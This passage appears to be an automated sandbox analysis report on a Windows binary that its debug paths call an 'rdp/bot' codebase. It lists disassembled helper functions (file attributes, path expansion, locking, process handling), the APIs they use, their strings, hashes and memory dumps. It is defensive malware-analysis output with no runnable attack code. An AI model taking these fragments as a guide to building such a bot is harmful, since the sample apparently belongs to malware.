String ID: (pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(pid=%lu,err=%08x)$[E] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$[E] (%s) -> TerminateProcess failed(pid=%lugle=%lu)$[I] (%s) -> Done(pid=%lu,exit_code=%08lx)$[W] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$process_close
API String ID: 1879646588-710610406
Opcode ID: 9af93892f762c45f910c54bc40b85a44544f55378dbc750c1b1ffcf500798316
Instruction ID: cafebd3f5a21eb3dc7c4479e2e34e50c7ade7dcab8529c8b71f860d3cfa64a76
Opcode Fuzzy Hash: 9af93892f762c45f910c54bc40b85a44544f55378dbc750c1b1ffcf500798316
Instruction Fuzzy Hash: 1C813A62E0C527C2FA32BF57F4C06B8D650AF00754F956073C85E57BA4EE2CAC818BA1

Function 00007FF764CC3909 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 123COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32 ref: 00007FF764CC392A
GetLastError.KERNEL32 ref: 00007FF764CC3A0A

Strings

, xrefs: 00007FF764CC3A2B
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF764CC39B5, 00007FF764CC39EE
(path != NULL), xrefs: 00007FF764CC39A7
(attr != NULL), xrefs: 00007FF764CC39E0
~, xrefs: 00007FF764CC3A8E
c, xrefs: 00007FF764CC39D1
NULL, xrefs: 00007FF764CC3B3A
[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu), xrefs: 00007FF764CC3A1F
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF764CC39A0, 00007FF764CC39D9
P, xrefs: 00007FF764CC3A93
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF764CC397E
fs_attr_get, xrefs: 00007FF764CC3977, 00007FF764CC39AE, 00007FF764CC39E7, 00007FF764CC3A18, 00007FF764CC3B4C
[D] (%s) -> Done(path=%s,attr=%08lx), xrefs: 00007FF764CC3B53

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: $(attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$P$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu)$c$fs_attr_get$~
API String ID: 1799206407-3397184676
Opcode ID: 43a625aec629d03aa6d79cb5304ec5a52587ca642a261aee81729d9de08253ea
Instruction ID: 2ae66cfd2331f5e0c9d9ca2c5db4ea6c9db17cb4a79edc6b305eb341da85205f
Opcode Fuzzy Hash: 43a625aec629d03aa6d79cb5304ec5a52587ca642a261aee81729d9de08253ea
Instruction Fuzzy Hash: 8C51E8A0A0C617D1FB30BF47B9C03B8E6506F04B94ED46133D95E06FB5AE6DA946CB21

Function 00007FF764CC6776 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 154COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNEL32 ref: 00007FF764CC67AA

Part of subcall function 00007FF764CC14E2: fwrite.MSVCRT ref: 00007FF764CC158E
Part of subcall function 00007FF764CC14E2: fflush.MSVCRT ref: 00007FF764CC159A

GetLastError.KERNEL32 ref: 00007FF764CC6909

Strings

(xpath != NULL), xrefs: 00007FF764CC683D
((*xpath_sz) > 0), xrefs: 00007FF764CC689D
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF764CC6803, 00007FF764CC6836, 00007FF764CC6866, 00007FF764CC6896
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF764CC6818, 00007FF764CC684B, 00007FF764CC687B, 00007FF764CC68AB
(path != NULL), xrefs: 00007FF764CC680A
fs_path_expand, xrefs: 00007FF764CC67DE, 00007FF764CC6811, 00007FF764CC6844, 00007FF764CC6874, 00007FF764CC68A4, 00007FF764CC68D6, 00007FF764CC6917, 00007FF764CC69E4
(xpath_sz != NULL), xrefs: 00007FF764CC686D
[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu), xrefs: 00007FF764CC691E
[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x), xrefs: 00007FF764CC68DD
[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu), xrefs: 00007FF764CC69EB
[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu), xrefs: 00007FF764CC67E5

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: EnvironmentErrorExpandLastStringsfflushfwrite
String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
API String ID: 1721699506-2819899730
Opcode ID: 8d39322b9df4c2373581e90f25656c1ce6d57fc1d0652e8ea0d116a04eb80657
Instruction ID: a6ff349881626ba7e1f34d444fa06e99d466cb91e58976a65c3043cbbb779ab4
Opcode Fuzzy Hash: 8d39322b9df4c2373581e90f25656c1ce6d57fc1d0652e8ea0d116a04eb80657
Instruction Fuzzy Hash: 4C614762F0C947D1FA30AF16EA803B8A251AF80748FD5A037D64D47790DE3DE946CB69

Function 00007FF764CC65E3 Relevance: 19.6, APIs: 4, Strings: 9, Instructions: 94stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF764CC660E
strlen.MSVCRT ref: 00007FF764CC6637
strlen.MSVCRT ref: 00007FF764CC6643
strlen.MSVCRT ref: 00007FF764CC6659

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF764CC66A1, 00007FF764CC66D1, 00007FF764CC6701
(path != NULL), xrefs: 00007FF764CC6693
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF764CC668C, 00007FF764CC66BC, 00007FF764CC66EC
fs_path_temp, xrefs: 00007FF764CC6667, 00007FF764CC669A, 00007FF764CC66CA, 00007FF764CC66FA, 00007FF764CC6734
(path_sz != NULL), xrefs: 00007FF764CC66C3
((*path_sz) > 0), xrefs: 00007FF764CC66F3
[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x), xrefs: 00007FF764CC673B
[I] (%s) -> Done(path=%s,path_sz=%llu), xrefs: 00007FF764CC666E
NULL, xrefs: 00007FF764CC676D

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: strlen
String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
API String ID: 39653677-3302659514
Opcode ID: 9005fe6a1410ecbce5668f3390039774c4afe792ecc5d441caa394cae7a7bd6d
Instruction ID: 9ba9bdaa121d11f8a460dc8faa53b15613273c28ee7c21b865395cd9bb8a64c9
Opcode Fuzzy Hash: 9005fe6a1410ecbce5668f3390039774c4afe792ecc5d441caa394cae7a7bd6d
Instruction Fuzzy Hash: 1E414961A09A43C0FE20BF57EA803B8E661AF40748FD86533D65D0B795EE3CE506CB24

Function 00007FF764CCA3E1 Relevance: 19.6, APIs: 6, Strings: 7, Instructions: 89memorystringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF764CCA4A6
GetProcessHeap.KERNEL32 ref: 00007FF764CCA4B4
HeapAlloc.KERNEL32 ref: 00007FF764CCA4C5
strlen.MSVCRT ref: 00007FF764CCA4E3
GetProcessHeap.KERNEL32 ref: 00007FF764CCA511
HeapFree.KERNEL32 ref: 00007FF764CCA522

Strings

mem_alloc, xrefs: 00007FF764CCA530
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF764CCA446, 00007FF764CCA476
(buf != NULL), xrefs: 00007FF764CCA44D
ini_get_bytes, xrefs: 00007FF764CCA454, 00007FF764CCA484
(buf_sz != NULL), xrefs: 00007FF764CCA47D
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF764CCA537
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF764CCA45B, 00007FF764CCA48B

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: Heap$Processstrlen$AllocFree
String ID: (buf != NULL)$(buf_sz != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Memory allocation failed(size=%llu)$ini_get_bytes$mem_alloc
API String ID: 1318626975-3964590784
Opcode ID: 31a9b0c9ef57b586841b2a845dbacab838252a909a596c335d565df8be9533e0
Instruction ID: f9b8f0b72d156009310a74c767b8d1b2572ec30089ad3355f9c2ecb546badcde
Opcode Fuzzy Hash: 31a9b0c9ef57b586841b2a845dbacab838252a909a596c335d565df8be9533e0
Instruction Fuzzy Hash: A3315721A09A47C5FA21FF13E8887B5A250AF84784FD86037D94D47B95EF3CE805C760

Function 00007FF764CC3B64 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 135COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF764CC3C3E

Part of subcall function 00007FF764CC3909: GetFileAttributesA.KERNEL32 ref: 00007FF764CC392A

SetFileAttributesA.KERNEL32 ref: 00007FF764CC3BAB

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF764CC3BDE, 00007FF764CC3C09
(path != NULL), xrefs: 00007FF764CC3BD0
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF764CC3BC9, 00007FF764CC3BF4
[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu), xrefs: 00007FF764CC3C55
[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x), xrefs: 00007FF764CC3D24
(attr != NULL), xrefs: 00007FF764CC3BFB
fs_attr_set, xrefs: 00007FF764CC3BD7, 00007FF764CC3C02, 00007FF764CC3C4E, 00007FF764CC3D1D, 00007FF764CC3D83
NULL, xrefs: 00007FF764CC3D74
[D] (%s) -> Done(path=%s,attr=%08lx), xrefs: 00007FF764CC3D8A

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: AttributesFile$ErrorLast
String ID: (attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x)$[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu)$fs_attr_set
API String ID: 365566950-3085771803
Opcode ID: f93d3b2482f8f60f86716dc3046e84e5b04d6afd5cb927c8b4350ba3ed7eb197
Instruction ID: e1150eb95c87f58f7d5373f5f2b2fc9a6a65ead1ac75409aa9910929e15496c4
Opcode Fuzzy Hash: f93d3b2482f8f60f86716dc3046e84e5b04d6afd5cb927c8b4350ba3ed7eb197
Instruction Fuzzy Hash: C4512961A1C647C6FA70BF16B5C02B9E661AF00744FA06133D91E86FB5EE2CE945CF21

Function 00007FF764CC6263 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 113fileCOMMON

Download Yara Rule

APIs

UnlockFileEx.KERNEL32 ref: 00007FF764CC62AB
CloseHandle.KERNEL32 ref: 00007FF764CC62BC

Part of subcall function 00007FF764CC14E2: fwrite.MSVCRT ref: 00007FF764CC158E
Part of subcall function 00007FF764CC14E2: fflush.MSVCRT ref: 00007FF764CC159A

GetLastError.KERNEL32 ref: 00007FF764CC6372

Strings

[I] (%s) -> Done(lock=%p), xrefs: 00007FF764CC62CC
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF764CC6301, 00007FF764CC6332
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF764CC62EC, 00007FF764CC631D
((*lock) != INVALID_HANDLE_VALUE), xrefs: 00007FF764CC6324
[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu), xrefs: 00007FF764CC6387
(lock != NULL), xrefs: 00007FF764CC62F3
fs_file_unlock, xrefs: 00007FF764CC62C5, 00007FF764CC62FA, 00007FF764CC632B, 00007FF764CC6356, 00007FF764CC6380
[E] (%s) -> Failed(lock=%p,err=%08x), xrefs: 00007FF764CC635D

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: CloseErrorFileHandleLastUnlockfflushfwrite
String ID: ((*lock) != INVALID_HANDLE_VALUE)$(lock != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(lock=%p,err=%08x)$[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu)$[I] (%s) -> Done(lock=%p)$fs_file_unlock
API String ID: 497672076-1436771859
Opcode ID: 8ed55aa620519c3cdf6ef64e90ec8783e4cc27decb79bbf1141b998d3a3c6f77
Instruction ID: ac400ba14489c1f079ef94f36fc3902115ed6863fc034b056813296a112d0def
Opcode Fuzzy Hash: 8ed55aa620519c3cdf6ef64e90ec8783e4cc27decb79bbf1141b998d3a3c6f77
Instruction Fuzzy Hash: 63416D61B0C943C0FB30EF17E6C0AB8E650AF507A8F946233C51D17BD59E2CA546CB65

Function 00007FF764CC8008 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 84memoryCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32 ref: 00007FF764CC8019
GetProcessHeap.KERNEL32 ref: 00007FF764CC804F
HeapAlloc.KERNEL32 ref: 00007FF764CC8063
wcslen.MSVCRT ref: 00007FF764CC8080
GetProcessHeap.KERNEL32 ref: 00007FF764CC8093
HeapAlloc.KERNEL32 ref: 00007FF764CC80A7
memcpy.MSVCRT ref: 00007FF764CC80CF

Part of subcall function 00007FF764CC14E2: fwrite.MSVCRT ref: 00007FF764CC158E
Part of subcall function 00007FF764CC14E2: fflush.MSVCRT ref: 00007FF764CC159A

Part of subcall function 00007FF764CC14E2: EnterCriticalSection.KERNEL32 ref: 00007FF764CC15B3
Part of subcall function 00007FF764CC14E2: LeaveCriticalSection.KERNEL32 ref: 00007FF764CC15DB
Part of subcall function 00007FF764CC14E2: CopyFileA.KERNEL32 ref: 00007FF764CC1638

GetProcessHeap.KERNEL32 ref: 00007FF764CC8114
HeapFree.KERNEL32 ref: 00007FF764CC8125

Strings

mem_alloc, xrefs: 00007FF764CC80DF, 00007FF764CC80FA
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF764CC80E6, 00007FF764CC8101

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: Heap$Process$AllocCriticalFileSection$AttributesCopyEnterFreeLeavefflushfwritememcpywcslen
String ID: [E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc
API String ID: 4155868088-3920367287
Opcode ID: d71845054931ee5661a4f0e49c7727aec33fd4ebbd6fe1cfdbad0b32c19fbd7b
Instruction ID: ad1528e4e6d35d04ae0857aafb3859ddc434f5ab826e86617db7f885bc342854
Opcode Fuzzy Hash: d71845054931ee5661a4f0e49c7727aec33fd4ebbd6fe1cfdbad0b32c19fbd7b
Instruction Fuzzy Hash: E2315025A08A47C1FA34AF07E4C0779E350AF48B81F849137CA4D47791EE2CE985DB30

Function 00007FF764CC6A5C Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 73COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF764CC6A8B
GetLastError.KERNEL32 ref: 00007FF764CC6A96

Strings

wfpblk.lock, xrefs: 00007FF764CC6A5C
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF764CC6B22, 00007FF764CC6B52, 00007FF764CC6B85
(path != NULL), xrefs: 00007FF764CC6B44
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF764CC6B0D, 00007FF764CC6B3D, 00007FF764CC6B70
(hnd != NULL), xrefs: 00007FF764CC6B14
(path_sz != NULL), xrefs: 00007FF764CC6B77
[E] (%s) -> Failed(hnd=0x%p,err=%08x), xrefs: 00007FF764CC6AEE
[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu), xrefs: 00007FF764CC6AB5
fs_module_path, xrefs: 00007FF764CC6AAE, 00007FF764CC6AE7, 00007FF764CC6B1B, 00007FF764CC6B4B, 00007FF764CC6B7E

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: (hnd != NULL)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu)$fs_module_path$wfpblk.lock
API String ID: 2776309574-2006444783
Opcode ID: 5ef8a0c181d4ca2dc1b4e531f8c728615214ac54cca10b92b6d115fd732b93fd
Instruction ID: 6c24b83e4568f59804100d842ee68d95f10354f0e6460c826e93a2d3c5a91887
Opcode Fuzzy Hash: 5ef8a0c181d4ca2dc1b4e531f8c728615214ac54cca10b92b6d115fd732b93fd
Instruction Fuzzy Hash: C7315A61A08907D1EE21EF17EA807B4A650BF00748FC4A133EA0C477A1EF6CA905CB20

Function 00007FF764CC5923 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 161fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00007FF764CC5969
GetFileSize.KERNEL32 ref: 00007FF764CC598C
CloseHandle.KERNEL32 ref: 00007FF764CC59AE
GetLastError.KERNEL32 ref: 00007FF764CC5A34
GetLastError.KERNEL32 ref: 00007FF764CC5AFA

Strings

C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF764CC59DC, 00007FF764CC5A0C
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF764CC59F1, 00007FF764CC5A21
(path != NULL), xrefs: 00007FF764CC59E3
(size != NULL), xrefs: 00007FF764CC5A13
fs_file_size, xrefs: 00007FF764CC59EA, 00007FF764CC5A1A

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleSize
String ID: (path != NULL)$(size != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_size
API String ID: 3555958901-1687387729
Opcode ID: 234c72b99976422c0fe9b9bc8d23519320ee5f2015ad074ca9f2bb95160527cb
Instruction ID: 5a6d0c9d2741b01c3010318176a9b9bb4df7dab128dc5649771f8911aadf77db
Opcode Fuzzy Hash: 234c72b99976422c0fe9b9bc8d23519320ee5f2015ad074ca9f2bb95160527cb
Instruction Fuzzy Hash: C3612C65E0C122C2FE307E17A0C437892509F41374FA966B3C45E9B3D1DE6DACC68A72

Function 00007FF764CC3222 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 87synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF764CC3233
GetLastError.KERNEL32 ref: 00007FF764CC328C

Strings

[E] (%s) -> WaitForSingleObject failed(pid=%lugle=%lu), xrefs: 00007FF764CC32A2
(pi != NULL), xrefs: 00007FF764CC326B
, xrefs: 00007FF764CC32AE
C:/Projects/rdp/bot/codebase/process.c, xrefs: 00007FF764CC3264
process_wait, xrefs: 00007FF764CC3272, 00007FF764CC329B
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF764CC3279
~, xrefs: 00007FF764CC330E
P, xrefs: 00007FF764CC3313

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: ErrorLastObjectSingleWait
String ID: $(pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> WaitForSingleObject failed(pid=%lugle=%lu)$process_wait$~
API String ID: 1211598281-4195011794
Opcode ID: e89e575069cd377681ba40a6117d1222de3d5140e96875bd9f274161d09d8a40
Instruction ID: ed3dea2ed0da3d19625635b1bad39b03fc1ef3c6c97ed7bccfd6303fcd7a2799
Opcode Fuzzy Hash: e89e575069cd377681ba40a6117d1222de3d5140e96875bd9f274161d09d8a40
Instruction Fuzzy Hash: B631CC10E0C207C2FF74BF56B4D43B8D2509F45314EE46533C61F86BA2DD5DA9869AB2

Function 00007FF764CC5C44 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 129filetimeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00007FF764CC5CA3
